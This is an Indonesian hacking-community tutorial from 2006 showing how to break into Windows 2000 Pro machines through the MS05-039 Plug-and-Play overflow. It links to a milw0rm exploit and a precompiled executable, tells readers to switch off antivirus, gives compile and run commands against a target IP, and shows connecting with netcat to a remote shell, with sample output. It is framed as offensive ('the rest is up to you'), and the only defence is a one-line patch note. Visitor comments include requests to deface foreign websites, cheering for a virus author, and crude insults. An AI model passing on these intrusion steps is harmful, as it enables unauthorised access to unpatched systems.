Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
Hack W2K Prof via Windows Plug-Play Service Remote Overflow
Date: Sunday, January 22, 2006    Hits: 6467    By:  NuX3r   
Pada sekitar bulan Agustus 2005, Microsoft mengumumkan adanya hole / cacat pada
sistem operasinya yang menimpa Windows 2000 Pro. Dimana hole/Vuln ini dianggap
sebagai "High Risk". Lihat pada situs microsoft.com :
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow

Dan celah ini juga yang digunakan oleh virus Zotob dan variant nya yang sempat
heboh pada saat itu. Maka pihak microsoft pun segera menghimbau agar Productnya
terutama Windows 2000 Pro untuk segera melakukan Update/Patch pada OS nya.

Celah ini tidak menutup kemungkinan terjadi pada Product OS Microsoft yang lain.
Seperti pada Windows XP, 2003, atau Windows 2000 Server. Tapi dari pengalaman
/me, Celah paling besar terjadi pada Windows 2000 Pro walaupun sudah SP4
(Service Pack 4).

BAck to the topic
-----------------

Disini /me akan mengajarkan bagaimana caranya meng-hack / masuk ke PC lain yang
ber-OS windows 2000 pro tersebut.

Tentunya juka akan menyerang kita harus mempunya senjata terlebih dahulu. Untuk
siapkan yterlebih dahulu tools yang akan digunakan.

Senjata yang diperlukan :

1. Exloits ----->> Download di http://www.milw0rm.com/id.php?id=1149
atau di website ini dengan nama hack2kpro.zip (file .exe)
2. PC dengan OS Windows 2000 atau linux
3. Compiler C utk compile exploit ---->> Untuk OS Windows bisa gunakan LCC
bisa di download di website ini. Dan di linux tentunya pake gcc
4. PC terkoneksi dengan target
5. Install Progam canggih Netcat (NC) for windows or linux --->> cari aja di goolge


OK, sekarang kita mulai untuk meng-hack PC Windows 2000 Pro
Ikuti langkah dibawah ini:

1. Download dulu exploitnya dengan nama file yang diinginkan, misal tools.c
lalu compile dengan compilernya.
Untuk linux dapat menggunakan gcc dengan perintah :
[root@NuXer]# gcc -o <nama exploit> <source file c>
Contoh : gcc -o toolsgua tools.c

Untuk OS Windows dengan menggunakan LCC tinggal open file tools.c tadi
lalu pilih menu compile. (Jangan lupa matikan dulu antivirus anda)
Jika anda bingung tinggal download saja yang sudah saya compile di site ini
dengan nama file hack2kpro.zip yang didalamnya terdapat file nux3r.exe

2. Setelah di dicompile menjadi file yang dapat dijalankan langsung.
Jalankan file tersebut dengan perintah :
Untuk windows -->> c:\ nuxer.exe <ip target> <port default>
Di linux -->> [root@NuX3r]# ./nuxer <ip target> <port default>
Ket : port default = 7777
Contoh : nuxer.exe 192.168.0.1 7777
di linux : ./nuxer 192.168.0.1 7777

Maka akan muncul
[*] connecting to 192.168.0.22:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.1:7777

Tekan Ctrl + C

Lalu setelah itu jalan Netcat yang sudah di download
Untuk windows : c:\ nc 192.168.0.1 7777
Untuk Linux : netcat 192.168.0.1 7777

Jika berhasil maka kita akan segera mendapatkan root shell Windows 2000 tsb.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Selanjutnya terserah anda...

-------------------------------------------------------------------------------
Pencegahan
-------------------------------------------------------------------------------
Cara mencegah hole / Vuln ini segera update Windows anda dengan update terbaru.
(MS05-039)

Greatz to : houseofdabus to exploit and milw0rm.com to distributed them, all echo staff
and My Box Mandriva 2006

::|| NuX3r ||::

Source: JASAKOM Information Center
 
1 2 3 4 5
Jasakom Community - Visitor Comment
Nama: indrajaya   Tgl: 2/25/2006 12:06:08 PM
Komentar:
brontok kapan ad lagi
Nama: al4m4k   Tgl: 2/13/2006 3:52:26 PM
Komentar:
[*] connecting to 10.5.13.3:445...ok [*] null session...ok [*] bind pipe...ok [*] sending crafted packet...ok [*] check your shell on 10.5.13.3:7777 ====================== kok giliran netcat, ga keluar apa2 yah ?? # netcat 10.5.13.3 7777 (dah gi
Nama: r3ged   Tgl: 2/11/2006 12:30:51 PM
Komentar:
TO : "LAMER-TUS" eh salah LAMBERTUS Belagu lo pake nantangin BRONTOK coder emang lo da hebat pa gmn CODER amatir ko ditantang Hoi Brontok Private Declare "Asu kwe" lib "user32.dll" alias "PERUSAK" (byval Mata-lo as jembut) as KONTOL DIM brontok as L
Nama: r3ged   Tgl: 2/11/2006 12:22:47 PM
Komentar:
pesan om S'to :"Maaf kata2 kotor ...dst tdk diperkenankan disini.." kalo sy pesan oseng2 JEMBUT boleh ngga??@#$$ :-)
Nama: Dian Maulani   Tgl: 2/11/2006 3:11:22 AM
Komentar:
http://www.geocities.com/dian_maulani2006/UNDANGAN.txt
Nama: [$#Otak Udang#$]   Tgl: 2/8/2006 1:06:55 AM
Komentar:
Exploit? duh...
Nama: freak-dentist   Tgl: 2/6/2006 4:17:04 AM
Komentar:
deface denmark website donk. tembus server denmark donk.
Nama: Lambertus   Tgl: 2/5/2006 10:45:42 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:41 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:40 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:38 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:38 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:36 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:35 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:34 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:33 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:32 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:30 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:30 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
Nama: Lambertus   Tgl: 2/5/2006 10:45:28 AM
Komentar:
"For Brontok" Gue tunggu virus kamu selanjutnya...
1 2 3 4 5

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?